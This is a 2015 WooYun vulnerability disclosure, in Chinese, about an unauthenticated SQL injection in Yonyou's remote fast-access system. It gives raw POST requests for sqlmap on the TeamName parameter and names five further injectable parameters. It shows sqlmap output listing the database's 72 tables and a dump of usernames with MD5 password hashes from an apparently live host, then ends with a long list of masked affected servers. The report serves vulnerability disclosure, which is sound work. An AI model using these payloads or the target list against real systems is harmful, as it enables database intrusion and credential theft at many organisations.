当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152899

漏洞标题:用友优普远程快速接入系统SQL注入漏洞(无需登陆/影响大量企业)

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2015-11-09 18:44

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-13: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

用友某通用平台sql注入漏洞(无需登陆,无限制获取数据,影响大量企业)

详细说明:

该系统是用友的优普U8系统,用户量很大,绕过测试,该问题影响使用该平台的所有企事业单位。
这里的sql注入点是root权限,可以写入文件并进一步利用。
注入点在:http://xxxx/Server/CmxItem.php?pgid=System_UpdateSave
post数据中的TeamName存在注入。其他注入点在后面给出吧
这里我们以**.**.**.**:81为例进行说明
先把payload贴这里吧,保存为XXX.txt,送给sqlmap就可以啦

POST /Server/CmxItem.php?pgid=System_UpdateSave HTTP/1.1
Host: **.**.**.**:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,zh-CN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: LANGUAGES=cn; PHPSESSID=uefi1k8tmrru2hh5virr84i032
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
TeamName=test


直接看看注入点的信息

注入点信息.JPG


看看系统中的数据库吧

database.JPG


来看看表的信息,72张表

web application technology: Apache, PHP 5.4.27
back-end DBMS: MySQL 5.0
Database: rasdatabase
[72 tables]
+---------------------------+
| hbadminrolegroupmembers   |
| hbadminrolerestrictedorgs |
| hbadminroletask           |
| hbadminroleusermembers    |
| hbclientgroupapplication  |
| hbclientgroupprinter      |
| hbdirectoryapplication    |
| hborgapplication          |
| hborglicensepolicy        |
| hborgpolicy               |
| hbpolicyvalues            |
| hbroletask                |
| hbserverapplication       |
| hbserverprinterdriver     |
| hbserverprintinf          |
| hbserverrole              |
| hbservertask              |
| hbtaskaction              |
| hbtaskcondition           |
| hbuserapplication         |
| hbuserdirectory           |
| hbuserorgs                |
| hbuserpolicy              |
| lograsarchi               |
| lograsconcurrenta         |
| lograsconcurrentus        |
| lograsent                 |
| lograssessi               |
| lograstaskactionhist      |
| lograstaskhist            |
| oemuserinfo               |
| rasactions                |
| rasadminroles             |
| rasadmintasks             |
| rasapplication            |
| rasbadprinterdriver       |
| rascfg                    |
| rasclient                 |
| rasclientgroup            |
| rascompatibilitydriver    |
| rasconcurrentsession      |
| rasconditions             |
| rasconnectionsetting      |
| rasdatabase               |
| rasdirectory              |
| rasdmzserverd             |
| rasdomain                 |
| rasgroupuser              |
| rasinfocollectordata      |
| rasjobs                   |
| rasjobsteps               |
| raslicenseinfo            |
| raslicensetoken           |
| raslicpolicy              |
| raslockdownpolicies       |
| rasmonthlyminute          |
| rasorgs                   |
| rasprinter                |
| rasprinterdriver          |
| rasproductk               |
| rasreqids                 |
| rasroles                  |
| rasrunningservers         |
| rasselection              |
| rasserver                 |
| rasstyle                  |
| rastasks                  |
| rasticketing              |
| rastimedsessio            |
| rasuser                   |
| rasusermng                |
| usermachines              |
+---------------------------+


看看用户信息

web application technology: Apache, PHP 5.4.27
back-end DBMS: MySQL 5.0
Database: rasdatabase
Table: rasuser
[7 entries]
+-----------+------------------------------------+
| UserName  | Password                         |
+-----------+----------------------------------+
| RAS_01    | 0077721c169fad8e3e5aed60729d3e77 |
| RAS_demo  | 2ac9b6c89caa8519103dc34b3d430e6a |
| Ras_admin | 47c1eb03755b751363eea24fb149f616 |
| RAS_07    | 49786e43a863aafd294ea260d270af78 |
| RAS_03    | 6668367528ad4f69171224e12c65626f |
| RAS_02    | 78fbbcc6c709ddd4168bde5c32105f26 |
| RAS_04    | ae555894eeb17518168bde5c32105f26 |
+-----------+----------------------------------+


其他5个注入点在这里
Post中的这下面5个参数也都存在注入,payload和利用方法类似:
TeamDescription
LogRasArchiPurgeDays
LogRasEntPurgeDays
LogUsagePurgeDays
JobRecordsPurgeDays

POST /Server/CmxItem.php?pgid=System_UpdateSave HTTP/1.1
Host: **.**.**.**:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,zh-CN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: LANGUAGES=cn; PHPSESSID=uefi1k8tmrru2hh5virr84i032
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
TeamDescription=test


最后来点案例吧

**.**.**.**:8000/download.php
**.**.**.**:8888/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**/download.php
**.**.**.**:81/download.php
**.**.**.**:8080/download.php
**.**.**.**:8888/download.php
**.**.**.**:8888/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:8001/download.php
http://**.**.**.**:81/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:8888/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8888/download.php
**.**.**.**:8888/download.php
**.**.**.**:8000/download.php
**.**.**.**:8000/download.php
**.**.**.**:8888/download.php
**.**.**.**:8080/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:8080/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8080/download.php

漏洞证明:

见 详细说明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-10 14:03

厂商回复:

已安排开发人员修复漏洞

最新状态:

暂无

漏洞评价:

评价